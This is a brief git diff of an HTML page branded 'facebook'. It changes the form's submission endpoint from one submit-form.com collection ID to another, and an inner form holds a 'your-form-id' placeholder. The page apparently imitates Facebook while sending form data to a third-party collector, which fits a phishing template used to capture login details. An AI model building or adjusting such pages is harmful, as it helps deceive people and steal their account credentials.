--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
       <b class="text-5xl text-white">facebook</b>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/n7mYa3pQG" method="post"> 
+  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/w9LzUzK0W" method="post"> 
 <form action="https://submit-form.com/your-form-id">
   <input
     type="hidden"
